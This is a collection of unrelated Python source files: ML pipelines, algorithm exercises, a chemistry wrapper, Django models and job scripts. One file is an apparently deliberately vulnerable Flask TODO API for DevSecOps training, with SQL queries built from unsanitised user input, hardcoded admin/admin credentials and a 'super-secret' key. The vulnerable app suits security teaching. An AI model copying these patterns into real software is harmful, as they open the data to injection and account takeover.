assert all(isinstance(k, FNode) for assign in assigns for k in assign)
assert all(k in env.formula_manager.formulae.values()
for assign in assigns for k in assign)
assert all(isinstance(v, FNode)
for assign in assigns for v in assign.values())
assert all(v in env.formula_manager.formulae.values()
for assign in assigns for v in assign.values())
assert all(not k.is_literal() or env.stc.get_type(k).is_bool_type()
for assign in assigns for k in assign)
yield from (assign2fnode(env, k, v)
for k, v in chain.from_iterable(assign.items()
for assign in assigns))
def new_symb(mgr: FormulaManager, base: str, s_type) -> FNode:
"""Return fresh symbol of the given type"""
assert isinstance(mgr, FormulaManager)
assert s_type in {types.BOOL, types.INT, types.REAL}
assert isinstance(base, str)
assert "%d" not in base
return mgr.new_fresh_symbol(s_type, f"{base}%d")
def linear_comb(env: PysmtEnv, symbs: FrozenSet[FNode],
prefix: str,
idx: Optional[int] = None,
totime=None) -> Tuple[FNode, List[FNode]]:
"""Return FNode expr representing linear combination of symbs and
list of parameters"""
assert isinstance(symbs, frozenset)
assert all(isinstance(s, FNode) for s in symbs)
assert all(s in env.formula_manager.formulae.values() for s in symbs)
assert isinstance(prefix, str)
assert idx is None or totime is not None
assert idx is None or isinstance(idx, int), idx
assert all(env.stc.get_type(s).is_int_type() for s in symbs) or \
all(env.stc.get_type(s).is_real_type() for s in symbs)
m_type = types.REAL
if symbs and env.stc.get_type(next(iter(symbs))).is_int_type():
m_type = types.INT
mgr = env.formula_manager
k = new_symb(mgr, f"{prefix}_k", m_type)
res = [k]
params = [k]
for s in symbs:
if idx is not None:
assert totime is not None
s = totime(s, idx)
coeff = new_symb(mgr, f"{prefix}_c", m_type)
params.append(coeff)
res.append(mgr.Times(coeff, s))
res = mgr.Plus(res)
assert all(p in mgr.get_all_symbols() for p in params)
return res, params
def new_enum(env: PysmtEnv, v_name: str, enum_size: int) -> \
Tuple[List[FNode], List[FNode]]:
"""Create boolean symbols to encode `enum_size` different values"""
assert isinstance(env, PysmtEnv)
assert isinstance(v_name, str)
assert isinstance(enum_size, int)
assert enum_size > 1
mgr = env.formula_manager
num_bits = ceil(mlog(enum_size, 2))
b_vars = [new_symb(mgr, f"{v_name}{idx}", types.BOOL)
for idx in range(num_bits)]
vals = []
for enum_val in range(enum_size):
bit_val = format(enum_val, '0{}b'.format(num_bits))
assert len(bit_val) == num_bits
assert all(c in {'0', '1'} for c in bit_val)
vals.append(mgr.And(b_vars[idx] if c == '1' else
mgr.Not(b_vars[idx])
for idx, c in enumerate(reversed(bit_val))))
assert len(vals) == enum_size
return b_vars, vals
|
import pandas as pd
from Titanic.titanic_lib import *
def run_column_boxplot(input_file, column, by=None):
df = pd.read_csv(input_file)
return column_boxplot(data=df, column=column, by=by)
def run_column_barchart(input_file, column, by):
df = pd.read_csv(input_file)
return column_barchart(data=df, column=column, by=by)
def run_test_classification_pipeline(input_file, target_feature, pipeline, gridsearch_params):
df = pd.read_csv(input_file)
X = impute_titanic_data(df, target_feature)
return test_classification_pipeline(
X=X,
y=df[target_feature],
pipeline=pipeline,
gridsearch_params=gridsearch_params
)
def run_make_prediction(train_file, test_file, target_feature, pipeline):
df_train = pd.read_csv(train_file)
df_test = pd.read_csv(test_file)
X_train = impute_titanic_data(df_train, target_feature)
X_test = impute_titanic_data(df_test, target_feature)
return pd.DataFrame({
'PassengerId': df_test['PassengerId'],
'Survived': make_prediction(X_train=X_train, y_train=df_train[target_feature], X_test=X_test, pipeline=pipeline)
})
|
# %%
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import sys
sys.path.insert(0, os.path.dirname('.'))
sys.path.insert(0, os.path.dirname('../'))
from data_utils import video_to_frames
from data_utils import metadata_loader
from data_utils.kth_dataset_builder import DatasetBuilder
from models.IMAGENET import Imagenet, Video_Feature_Extractor
from models.IMAGENET import AVG_Video_Classifier, LSTM_Video_Classifier
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Activation, Dense, Conv3D, MaxPool3D, Flatten, Dropout, BatchNormalization, LSTM, Conv2D
from tensorflow.keras.layers import GlobalAveragePooling1D, GlobalAveragePooling2D, TimeDistributed
from tensorflow.keras.optimizers import RMSprop
from tensorflow.keras.losses import CategoricalCrossentropy
# Load Dataset
video_path = './data/kth-actions/video'
frame_path = './data/kth-actions/frame'
# Setup builder
video_path = '../data/kth-actions/video'
frame_path = '../data/kth-actions/frame'
builder = DatasetBuilder(video_path, frame_path, img_width=84, img_height=84, ms_per_frame=1000, max_frames=16)
# Convert videos and generate metadata
#builder.convert_videos_to_frames()
metadata = builder.generate_metadata()
# Build datasets
train_ds = builder.make_video_dataset(metadata=metadata['train'])
valid_ds = builder.make_video_dataset(metadata=metadata['valid'])
# Preprocess dataset
IMG_SIZE = 160 # All images will be resized to 160x160
IMG_SHAPE = [IMG_SIZE, IMG_SIZE, 3]
def format_example(image, label):
image = tf.repeat(image,3,axis=3)
image = tf.image.resize(image, IMG_SHAPE[0:2])
image.set_shape([None]+IMG_SHAPE)
return image, label
train_ds = train_ds.map(format_example)
valid_ds = valid_ds.map(format_example)
# Print
for x, lab in valid_ds.take(1):
print(x.shape, lab.shape)
print(train_ds)
# %%
def My_Video_Classifier(features, class_nr, optimizer='adam'):
# model
full_model = tf.keras.Sequential([
features,
LSTM(1024, input_shape=(None,2048)),
Dense(512, kernel_initializer="he_normal"),
Dropout(rate=0.4),
Dense(class_nr)
])
#compile model
full_model.compile(
optimizer=optimizer,
loss=CategoricalCrossentropy(from_logits=True),
metrics=['accuracy']
)
return full_model
# Base model (returns pretrained frozen base model trained on Imagenet)
inception = Imagenet(input_shape=IMG_SHAPE, name='inception')
# Feature Extractor (Has output (NR_FRAME x D) where D is feature dimension)
featuer_ex = Video_Feature_Extractor(inception)
# LSTM Clasifier
model = My_Video_Classifier(features=featuer_ex, class_nr=6)
model.summary()
|
from django.shortcuts import render,HttpResponse
from django.http import HttpResponseRedirect
def global_data(view_func):
def login_check(request,code=0):
return view_func(request)
return login_check |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^auth$', views.vk_auth, name='vk_auth'),
]
|
class Interval:
def __init__(self, s=0, e=0):
self.start = s
self.end = e
class Solution:
# @param {Interval[]} intervals
# @param {Interval} newInterval
# @return {Interval[]}
def insert(self, intervals, newInterval):
start = newInterval.start
end = newInterval.end
t = ''
ans = []
if len(intervals) == 0:
return [newInterval]
for i in intervals:
if t == '' and start > i.end:
ans.append(i)
elif t == '' and end < i.start:
t = 'x'
ans.append(newInterval)
ans.append(i)
elif t == '' and start < i.start and end <= i.end:
t = 'x'
newInterval.end = i.end
ans.append(newInterval)
elif t == '' and start >= i.start and end <= i.end:
t = 'x'
ans.append(i)
elif t == '' and start > i.start:
t = 'i'
newInterval.start = i.start
elif t == '' and start <= i.start:
t = 'i'
elif t == 'i' and end > i.end:
pass
elif t == 'i' and end >= i.start and end <= i.end:
newInterval.end = i.end
ans.append(newInterval)
t = 'x'
elif t == 'i':
ans.append(newInterval)
ans.append(i)
t = 'x'
elif t == 'x':
ans.append(i)
if newInterval.end > intervals[-1].end:
ans.append(newInterval)
return ans
test = Solution()
i1 = Interval(2,4)
i2 = Interval(5,7)
i3 = Interval(8,10)
i4 = Interval(3,8)
for i in test.insert([i1, i2, i3], i4):
print i.start, i.end
print '---'
i1 = Interval(1,5)
i2 = Interval(1,5)
for i in test.insert([i1], i2):
print i.start, i.end
print '---'
i1 = Interval(2,3)
i2 = Interval(4,5)
i3 = Interval(6,7)
i4 = Interval(4,6)
for i in test.insert([i1, i2, i3], i4):
print i.start, i.end |
# Examples from Mining the Social Web, section 8
import webbrowser
import requests # pip install requests
from BeautifulSoup import BeautifulSoup # pip install BeautifulSoup
# XXX: Any URL containing a geo microformat...
URL = 'http://en.wikipedia.org/wiki/Kaunas'
req = requests.get(URL, headers={'User-Agent': "Mining the Social Web"})
soup = BeautifulSoup(req.text)
geoTag = soup.find(True, 'geo')
if geoTag and len(geoTag) > 1:
lat = geoTag.find(True, 'latitude').string
lon = geoTag.find(True, 'longitude').string
print 'Location is at', lat, lon
elif geoTag and len(geoTag) == 1:
(lat, lon) = geoTag.string.split(';')
(lat, lon) = (lat.strip(), lon.strip())
print 'Location is at', lat, lon
else:
print 'No location found'
google_maps_url = "http://maps.google.com/maps?q={0}+{1}&ie=UTF8&t=h&z=14&{0},{1}".format(lat, lon)
webbrowser.open(google_maps_url)
|
import subprocess
from io import StringIO
import numpy as np
from pyorca import orcaconfig as config
class OrcaWrapper:
def __init__(self, jobname, elements, theory, basis, *args, parallel=None):
self.elements = elements
self.jobname = jobname
if 'mp2' in theory.lower():
args = (*args, 'nofrozencore')
if theory.lower() == 'ri-mp2':
basis = f'{basis} {basis}/C'
self.header = f'! {" ".join([theory, basis, *args])} bohrs verytightscf ' + '{job_type:}\n'
if parallel is not None:
self.header += f'%pal nprocs {parallel}\n end\n'
def run_orca(self, input_str):
with open(f'{self.jobname}.inp', 'w') as f:
f.write(input_str)
args = [config.ORCA_EXEC, f'{self.jobname}.inp']
with subprocess.Popen(args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc:
out = proc.stdout.read().decode()
if '****ORCA TERMINATED NORMALLY****' not in out:
raise RuntimeError(out)
return
def write_coord_string(self, coords, charge, multiplicity):
coords_str = f'* xyz {charge} {multiplicity}\n'
coords_str += '\n'.join(
f'{e} {x:20.12f} {y:20.12f} {z:20.12f}' for e, (x, y, z) in zip(self.elements, coords.reshape(-1, 3)))
coords_str += '\n*\n'
return coords_str
def run_job(self, job_type, coords, charge=0, multiplicity=1):
input_str = self.header.format(job_type=job_type)
input_str += self.write_coord_string(coords, charge, multiplicity)
self.run_orca(input_str)
def get_scf_energy(self, coords, charge=0, multiplicity=1):
self.run_job('svp', coords, charge, multiplicity)
properties = open(f'{self.jobname}_property.txt', 'r').readlines()
scf = None
for line in properties:
if 'SCF Energy' in line:
scf = float(line.strip().split()[-1])
return scf
def read_geometry(self):
atoms = len(self.elements)
lines = open(f'{self.jobname}_property.txt', 'r').readlines()
x = None
for i, line in enumerate(lines):
if line == '------------------------ !GEOMETRY! -------------------------\n':
block = "".join(lines[i + 3:i + 3 + atoms])
x = np.loadtxt(StringIO(block), usecols=(1, 2, 3))
return x
def optimize(self, coords, charge=0, multiplicity=1):
self.run_job('verytightopt', coords, charge, multiplicity)
return self.read_geometry() / 5.291772083e-1
def generate_hessian_columns(self, size):
lines = open(f'{self.jobname}.hess', 'r').readlines()
start = lines.index('$hessian\n')
end = lines.index('$vibrational_frequencies\n')
hess_lines = lines[start + 2:end - 1]
blocks = []
while hess_lines:
block, hess_lines = hess_lines[:size + 1], hess_lines[size + 1:]
block = "".join(block[1:])
blocks.append(np.loadtxt(StringIO(block))[:, 1:])
hess = np.hstack(blocks)
start = lines.index('$atoms\n')
end = lines.index('$actual_temperature\n')
coords_lines = lines[start + 2:end - 1]
coords = np.loadtxt(StringIO("".join(coords_lines)), usecols=(2, 3, 4))
return hess, coords
def get_hessian(self, coords, charge=0, multiplicity=1, opt=False):
job_type = ('verytightopt ' if opt else '') + 'anfreq'
n = coords.size // 3
self.run_job(job_type, coords, charge, multiplicity)
hess, x = self.generate_hessian_columns(coords.size)
hess = hess.reshape((n, 3, n, 3,))
if opt:
return hess, x
else:
return hess
def main():
elements = 'O H H'.split()
pot = OrcaWrapper(jobname='job', elements=elements, theory='RHF', basis='sto-3g')
coords = np.array([0.00000000000000, 0.00000000000000, 0.05568551114552,
0.00000000000000, 0.76411921207143, -0.54015925557276,
0.00000000000000, -0.76411921207143, -0.64015925557275]) / 5.291772083e-1
hess, coords = pot.get_hessian(coords, opt=True)
print(coords)
if __name__ == '__main__':
main()
|
class Hero:
#class variabel
jumlah_hero = 0
def __init__(self, inputName, inputHealth, inputPower, inputArmor):
#instance variabel
self.name = inputName
self.health = inputHealth
self.power = inputPower
self.armor = inputArmor
Hero.jumlah_hero += 1
#void function, method tanpa return
def siapa(self):
print("namaku adalah " + self.name)
#method dengan argumen
def healthUp(self, up):
self.health += up
#method dengan return
def getHealth(self):
return self.health
hero1 = Hero("sniper", 100, 10, 5)
hero2 = Hero("mario bros", 90,5,10)
hero1.siapa()
hero1.healthUp(10)
print(hero1.getHealth()) |
from django.db import models
from django.contrib.auth.models import AbstractUser
class TTUser(AbstractUser):
bio = models.TextField(max_length=500, blank=True)
portrait = models.ImageField(upload_to='profile_pictures/')
reference = models.CharField(max_length=50, default='User Reference')
def __str__(self):
return self.username
def save(self, **kwargs):
ref = ""
if self.first_name:
ref += self.first_name
if self.last_name:
ref += " "
ref += self.last_name
else:
ref = self.username
self.reference = ref
super().save(**kwargs)
|
from linkedlist import LinkedList
def delmiddle(n,i):
current = n.start
prev = None
while current:
if current.value == i:
prev.next = current.next
n.length -= 1
return True
else:
prev = current
current = current.next
return False
l= LinkedList()
l.append(1)
l.append(2)
l.append(3)
l.append(5)
l.append(3)
l.append(2)
l.append(10)
print(l.len())
delmiddle(l,10)
print(l.len())
# delmiddle(l,1)
print(l)
|
import flask
from flask import request, jsonify
# from flaskext.mysql import MySQL
from flask_jwt import JWT, jwt_required
from werkzeug.security import safe_str_cmp
from flasgger import Swagger
# SQLITE3 setup for Flask
import sqlite3 as sql
app = flask.Flask(__name__)
app.config["DEBUG"] = True
app.config['SECRET_KEY'] = 'super-secret'
jwt = JWT(app, authenticate, identity)
"""
curl -d '{"username": "admin", "password":"admin"}' -H 'Content-Type: application/json' http://127.0.0.1:5000/auth -v
{
"access_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6MiwiaWF0IjoxNjAxNzM2MjAyLCJuYmYiOjE2MDE3MzYyMDIsImV4cCI6MTYwMTczNjUwMn0.ywAwJEayJOOZ2s1Kk7y40n_v3rRX8H-2TYSM1hYXxRA"
}
curl http://127.0.0.1:5000/api/v1/resources/todos -v
curl -H 'Content-Type: application/json' -H 'Authorization: JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6MiwiaWF0IjoxNjAxNzUxMDY2LCJuYmYiOjE2MDE3NTEwNjYsImV4cCI6MTYwMTc1MTM2Nn0._5KmYgv2Alpp7OzDp_SvpZg7y5N7Lw6vV6Lm_o7aqgc' http://127.0.0.1:5000/api/v1/resources/todos
curl -d '{"username": "admin", "password":"admin"}' -H 'Content-Type: application/json' http://127.0.0.1:5000/auth -v
curl http://127.0.0.1:5000/api/v1/resources/todos -v
"""
DATABASE = 'todos.db'
class User(object):
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def __str__(self):
return "User(id='%s')" % self.id
users = [
User(1, 'root', 'root'),
User(2, 'admin', 'admin'),
]
username_table = {u.username: u for u in users}
userid_table = {u.id: u for u in users}
def authenticate(username, password):
user = username_table.get(username, None)
if user and safe_str_cmp(user.password.encode('utf-8'), password.encode('utf-8')):
return user
def identity(payload):
user_id = payload['identity']
return userid_table.get(user_id, None)
swagger = Swagger(app)
@app.route('/', methods=['GET'])
def home():
return "<h1>Practical DevSecOps TODOs API</h1>"
@app.route('/api/v1/resources/todos', methods=['GET'])
@jwt_required()
def get_all_todos():
"""Returns a list of todo item
---
produces:
- "application/json"
responses:
200:
description: "list of tasks"
schema:
type: "array"
items:
$ref: "#/definitions/Task"
400:
description: "Invalid ID supplied"
404:
description: "todo item not found"
"""
with sql.connect("todos.db") as con:
cursor = con.cursor()
cursor.execute("SELECT * from todos")
todos = cursor.fetchall()
cursor.close()
return jsonify(todos), 200
@app.route('/api/v1/resources/todos/<string:id>', methods=['GET'])
def get_todo(id):
"""Returns a todo item
---
produces:
- "application/json"
parameters:
- name: "id"
in: "path"
description: "ID of todo item to return"
required: true
type: "integer"
format: "int64"
default: all
responses:
200:
description: "successful operation"
schema:
$ref: "#/definitions/Task"
400:
description: "Invalid ID supplied"
404:
description: "todo item not found"
definitions:
Task:
type: "object"
properties:
id:
type: "integer"
format: "int64"
user:
type: "string"
todo:
type: "string"
date:
type: "string"
format: date
"""
"""
if 'id' in request.args:
id = request.args['id']
else:
error = {"Error": "No id found. Please specify an id."}
return jsonify(error), 404
"""
with sql.connect("todos.db") as con:
cursor = con.cursor()
cursor.execute("SELECT * from todos where id="+str(id))
todo = cursor.fetchone()
cursor.close()
return jsonify(todo), 200
@app.route('/api/v1/resources/todos', methods=['POST'])
def add_todo():
""" Add a new task to the store
---
consumes:
- "application/json"
produces:
- "application/json"
parameters:
- in: "body"
name: "body"
description: "Task object that needs to be added to the store"
required: true
schema:
$ref: "#/definitions/Task"
responses:
201:
description: "Task added"
405:
description: "Invalid input"
"""
todo = request.get_json()
print(todo)
query = "INSERT INTO todos(user, todo, date) VALUES('{}','{}', '{}')".format(todo['user'], todo['todo'], todo['date'])
print(query)
with sql.connect("todos.db") as con:
cursor = con.cursor()
cursor.execute(query)
con.commit()
cursor.close()
return jsonify(todo), 201
@app.route('/api/v1/resources/todos/<string:id>', methods=['PUT'])
def update_todo(id):
""" Update an existing todo item
---
consumes:
- "application/json"
produces:
- "application/json"
parameters:
- name: "id"
in: "path"
description: "ID of todo item to return"
required: true
type: "integer"
format: "int64"
- in: "body"
name: "body"
description: "Task object that needs to be added to the store"
required: true
schema:
$ref: "#/definitions/Task"
responses:
400:
description: "Invalid ID supplied"
404:
description: "Task not found"
405:
description: "Validation exception"
"""
todo = request.get_json()
# print(todo['task'])
# UPDATE customers SET address = 'Canyon 123', user=imran WHERE address = 'Valley 345'
query = "UPDATE todos set user='{}', todo='{}', date='{}' WHERE id={}".format(todo['user'], todo['todo'], todo['date'], id)
# query = "Update todos set user={todo['user']} todo={todo['todo']}, date={todo['date']} where id={id}"
print(query)
with sql.connect("todos.db") as con:
cursor = con.cursor()
cursor.execute(query)
con.commit()
cursor.execute("SELECT * from todos where id="+str(id))
todo = cursor.fetchone()
cursor.close()
return jsonify(todo), 200
@app.route('/api/v1/resources/todos/<int:id>', methods=['DELETE'])
def delete_todo(id):
"""summary: "Deletes a task"
---
produces:
- "application/json"
parameters:
- name: "id"
in: "path"
description: "Task id to delete"
required: true
type: "integer"
format: "int64"
responses:
200:
description: "Task deleted"
400:
description: "Invalid ID supplied"
404:
description: "Task not found"
"""
query = "DELETE FROM todos WHERE id="+str(id)
print(query)
with sql.connect("todos.db") as con:
cursor = con.cursor()
cursor.execute(query)
con.commit()
cursor.close()
message = "Id: " + str(id) + " Deleted"
json_message = {"message": message}
return jsonify(json_message), 200
if __name__ == '__main__':
app.run(host='0.0.0.0')
|
__version__ = '0.5'
from .antenna import *
from .topica import TopicaResult
from .digital_twin import DigitalTwin
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-04-16 03:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='article',
name='status',
field=models.SmallIntegerField(choices=[(1, '\u6b63\u5728\u5ba1\u6838'), (2, '\u5ba1\u6838\u901a\u8fc7'), (3, '\u5ba1\u6838\u5931\u8d25')], default=1, verbose_name='\u72b6\u6001'),
),
]
|
# Example script to run methods on sample data
# Code modified from the version by Byron Yu byronyu@stanford.edu, John Cunningham jcunnin@stanford.edu
from extract_traj import extract_traj, mean_squared_error, goodness_of_fit_rsquared, getPredErrorVsDim
from data_simulator import load_data
import numpy as np
from core_gpfa.postprocess import postprocess
from core_gpfa.plot_3d import plot_3d, plot_1d, plot_1d_error
import matplotlib.pyplot as plt
# import matplotlib
# matplotlib.use('agg')
# plt.switch_backend('agg')
# set random seed for reproducibility
# np.random.seed(1)
RUN_ID = 1
OUTPUT_DIR = './output/'+str(RUN_ID)+'/'
x_dim = 8 # latent dimension for 'rbf'
# x_dim = 2 # for 'sm'
method = 'gpfa'
param_cov_type = 'rbf' # type of kernel: 'rbf' or 'sm'
param_Q = 2 # number of mixtures for SM
num_folds = 3 # change to n>=2 for n-fold cross-validation
kern_SD = 30
INPUT_FILE = './input/fake_data_{}.mat'.format(param_cov_type)
# INPUT_FILE = '../em_input_new.mat'
# INPUT_FILE = '../dataForRoman_sort.mat'
# INPUT_FILE = '../fake_data2_w_genparams.mat' # '../em_input_new.mat', '../fake_data2_w_genparams.mat', '../fake_data_w_genparams.mat'
# Load data
dat = load_data(INPUT_FILE)
result = extract_traj(output_dir=OUTPUT_DIR, data=dat, method=method, x_dim=x_dim,\
param_cov_type=param_cov_type, param_Q = param_Q, num_folds = num_folds)
# Extract trajectories for dufferent dimensionalities
# dims = [2, 5, 8]
# for x_dim in dims:
# result = extract_traj(output_dir=OUTPUT_DIR, data=dat, method=method, x_dim=x_dim,\
# param_cov_type=param_cov_type, param_Q = param_Q, num_folds = num_folds)
# Get leave-one-out prediction (see Yu et al., 2009 for details on GPFA reduced)
# gpfa_errs, gpfa_reduced_errs = getPredErrorVsDim(OUTPUT_DIR, method, param_cov_type, num_folds, dims)
# # Plotting can be done as follows:
# plt.plot(dims, gpfa_errs, '--k')
# plt.plot(np.arange(1,gpfa_reduced_errs.size+1),gpfa_reduced_errs)
# plt.xlabel('State dimensionality')
# plt.ylabel('Prediction error')
# Orthonormalize trajectories
# Returns results for the last run cross-validation fold, if enabled
(est_params, seq_train, seq_test) = postprocess(result['params'], result['seq_train'], result['seq_test'], method)
print("LL for training: %.4f, for testing: %.4f, method: %s, x_dim:%d, param_cov_type:%s, param_Q:%d"\
% (result['LLtrain'], result['LLtest'], method, x_dim, param_cov_type, param_Q))
# Output filenames for plots
output_file = OUTPUT_DIR+"/"+method+"_xdim_"+str(x_dim)+"_cov_"+param_cov_type
# Plot trajectories in 3D space
if x_dim >=3:
plot_3d(seq_train, 'x_orth', dims_to_plot=[0,1,2], output_file=output_file)
# Plot each dimension of trajectory
# plot_1d(seq_train, 'x_sm', result['bin_width'], output_file=output_file)
plot_1d(seq_train, 'x_orth', result['bin_width'], output_file=output_file)
# Prediction error and extrapolation plots on test set
if len(seq_test)>0:
# Change to 'x_orth' to get prediction error for orthogonalized trajectories
mean_error_trials = mean_squared_error(seq_test, 'x_orth')
print("Mean sequared error across trials: %.4f" % mean_error_trials)
r2_trials = goodness_of_fit_rsquared(seq_test, x_dim, 'xsm')
print("R^2 averaged across trials: %s" % np.array_str(r2_trials, precision=4))
# # Plot each dimension of trajectory, test data
# plot_1d(seq_test, 'x_orth', result['bin_width'])
# Change to 'x_orth' to plot orthogonalized trajectories
plot_1d_error(seq_test, 'x_orth', result['bin_width'], output_file=output_file)
# Plot all figures
plt.show()
# Cross-validation to find optimal state dimensionality
# TODO |
from typing import List
class Solution:
def coinChange(self, coins: List[int], amount: int) -> int:
# 完全背包
# 最少值
dp = [None] * (amount + 1)
dp[0] = 0
for x in coins:
for i in range(x, amount + 1):
if dp[i - x] is not None:
if dp[i] is None:
dp[i] = dp[i - x] + 1
else:
dp[i] = min(dp[i], dp[i - x] + 1)
if dp[amount] is None:
return -1
return dp[amount]
print(Solution().coinChange([1, 2, 5], 11))
print(Solution().coinChange([2], 3))
|
"""Miscellaneous tools and shortcuts"""
from datetime import datetime
from functools import wraps
from dataclasses import asdict
from toolz import excepts
def onlyone(iterable):
"""get the only item in an iterable"""
value, = iterable
return value
def replace(instance, **kwargs):
"""replace values in a dataclass instance"""
return instance.__class__(**{**asdict(instance), **kwargs})
def apply(func, args=(), kwargs=None):
"""apply args and kwargs to a function"""
return func(*args, **kwargs or {})
def notnone(obj):
"""return whether an object is not None"""
return obj is not None
class StrRepr():
"""mixin which adds a ``__repr__`` based on ``__str__``"""
def __str__(self):
return '{0.__class__.__name__} object'.format(self)
def __repr__(self):
return '<{0.__class__.__name__}: {0}>'.format(self)
class NO_DEFAULT:
"""sentinel for no default"""
def lookup_defaults(lookup, default):
return excepts(LookupError, lookup, lambda _: default)
def skipnone(func):
"""wrap a function so that it returns None when getting None as input"""
@wraps(func)
def wrapper(arg):
return None if arg is None else func(arg)
return wrapper
def parse_iso8601(dtstring: str) -> datetime:
"""naive parser for ISO8061 datetime strings,
Parameters
----------
dtstring
the datetime as string in one of two formats:
* ``2017-11-20T07:16:29+0000``
* ``2017-11-20T07:16:29Z``
"""
return datetime.strptime(
dtstring,
'%Y-%m-%dT%H:%M:%SZ' if len(dtstring) == 20 else '%Y-%m-%dT%H:%M:%S%z')
|
n = int(input())
matrix = [list(map(int, input().split())) for _ in range(n)]
blue, white = 0,0 #blue, white count
def square(x, y, n):
global matrix, blue, white
check = True
first_color = matrix[x][y]
for i in range(x, x+n):
if not check: break
for j in range(y, y+n):
if matrix[i][j] != first_color:
check = False
k = n//2
square(x, y, k)
square(x+k, y, k)
square(x, y+k, k)
square(x+k, y+k, k)
break
if check:
if first_color == 1:
blue += 1
return
elif first_color == 0:
white += 1
return
square(0, 0, n)
print(f'{white}\n{blue}')
|
from setuptools import setup, find_packages
exec(open("./src/pytest_vts/version.py").read())
with open("PyPI_LONGDESC.rst") as fd:
long_description = fd.read()
keywords = ("pytest plugin http stub mock record responses recorder "
"vcr betamax automatic")
setup(
name="pytest-vts",
version=__version__, # noqa
packages=find_packages("src"),
package_dir={"": "src"},
install_requires=[
"pytest >=2.3",
"responses",
"cookies",
"six",
"urllib3 !=1.25.0,!=1.25.1,!=1.25.2"
],
entry_points={
"pytest11": [
"pytest_vts = pytest_vts"
],
},
# metadata for upload to PyPI
author="Bogdan Hodorog",
author_email="bogdan.hodorog@gmail.com",
description="pytest plugin for automatic recording of http stubbed tests",
long_description=long_description,
license="MIT",
keywords=keywords,
classifiers=["Framework :: Pytest"],
project_urls={
'Bug Reports': 'https://github.com/bhodorog/pytest-vts/issues',
'Source': 'https://github.com/bhodorog/pytest-vts',
},
)
|
# This program solves Ackermann's function
# Ackermann's function
def ackermann(m, n):
if m == 0:
return n + 1
elif n == 0:
return ackermann(m - 1, 1)
else:
return ackermann(m - 1, ackermann(m, n - 1))
# The main function
def main():
print(ackermann(2, 5))
# Call the main function
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 8 12:42:19 2020
@author: tomasla
"""
from optimize import optimize
import argparse
import os
import time
# %% ArgParse
parser = argparse.ArgumentParser('Gradient Descent based Structure Optimization')
parser.add_argument('-d', '--domain', metavar='', required=True, help='Domain Name')
parser.add_argument('-n', '--numoptim', type=int, metavar='', required=False, help='Send "n" different jobs to cluster with different random states', default=0)
parser.add_argument('-s', '--structurepath', metavar='', required=False, help='path where Structure is saved. If not provided a new object is created', default='')
parser.add_argument('-r', '--randomstate', type=int, metavar='', required=False, help='Domain Name', default=1)
parser.add_argument('-o', '--outputdir', metavar='', required=False, help='Directory where the output should be saved', default='./')
parser.add_argument('-i', '--iterations', type=int, metavar='', required=False, help='Number of iterations', default=100)
parser.add_argument('-ap', '--anglepotential', metavar='', required=False, help='If angle potential should be used for the calculation of Loss', default='True')
parser.add_argument('-lr', '--learningrate', type=float, metavar='', required=False, help='Learning rate', default=1.0)
parser.add_argument('-ld', '--lrdecay', type=float, metavar='', required=False, help='Learning rate decay parameter', default=1.0)
parser.add_argument('-f', '--decayfrequency', type=int, metavar='', required=False, help='Learning rate Decay frequency', default=100)
parser.add_argument('-m', '--momentum', type=float, metavar='', required=False, help='momentum parameter', default=0.0)
parser.add_argument('-nm', '--nesterov', metavar='', required=False, help='Nesterov Momentum', default='False')
parser.add_argument('-v', '--verbose', type=int, metavar='', required=False, help='How often should the program print info about losses. Default=iterations/20', default=-1)
args = parser.parse_args()
# %%
if __name__ == '__main__':
if args.numoptim == 0:
optimize(domain=args.domain,
structure_path=args.structurepath,
random_state=args.randomstate,
output_dir=args.outputdir,
iterations=args.iterations,
lr=args.learningrate,
lr_decay=args.lrdecay,
decay_frequency=args.decayfrequency,
momentum=args.momentum,
nesterov=args.nesterov,
verbose=args.verbose
)
else:
os.system(f"mkdir -p {args.outputdir}/temp_{args.domain}")
os.system(f"mkdir {args.outputdir}/{args.domain}")
for i in range(args.numoptim):
with open(f'{args.outputdir}/temp_{args.domain}/{args.domain}_{i}.sh', 'w') as f:
f.write('#!/bin/bash\n')
f.write('#SBATCH --mem=4g\n')
f.write('#SBATCH -t 1000\n')
f.write(f'#SBATCH -o ../../steps/garbage/{args.domain}-%j.out\n')
f.write(f'python3 optimize_script.py -d {args.domain} -r {i} -o {args.outputdir}/{args.domain} -i {args.iterations} -ap {args.anglepotential} -lr {args.learningrate} -ld {args.lrdecay} -f {args.decayfrequency} -m {args.momentum} -nm {args.nesterov} -v {args.verbose}')
os.system(f"sbatch {args.outputdir}/temp_{args.domain}/{args.domain}_{i}.sh")
|
###################################################
## sobel.py : utility script for applying a sobel filter to all images in a folder
## @author Luc Courbariaux 2018
###################################################
import argparse
parser = argparse.ArgumentParser(description='gets all images in INPUT folder, applies a sobel filter them and puts them in OUTPUT directory.')
parser.add_argument('-i', '--input', nargs='?', default="./", help='folder from which the images')
parser.add_argument('-o', '--output', nargs='?', default="./dataset/", help='folder to store the images')
args = parser.parse_args()
import os
import numpy
from PIL import Image
import scipy
from scipy import ndimage
input = args.input
output = args.output
try:
os.mkdir(output)
except:
pass
for file in os.listdir(input):
#sobel filter
#based on https://stackoverflow.com/questions/7185655
if file.endswith(".jpg") or file.endswith(".bmp") :
im = scipy.misc.imread(input + "/" + file)
im = im.astype('int32')
dx = ndimage.sobel(im, 0) # horizontal derivative
dy = ndimage.sobel(im, 1) # vertical derivative
mag = numpy.hypot(dx, dy) # magnitude
mag *= 255.0 / numpy.max(mag) # normalize (Q&D)
mag = mag.mean(axis=2)
mag = mag.astype("uint8")
img = Image.fromarray(mag)
img.save(output + "/" + file) |
import scrapy
import os
import subprocess
import urlparse
from datetime import datetime, timedelta
import time
import re
from texttable import Texttable
import json
#format file with regex:
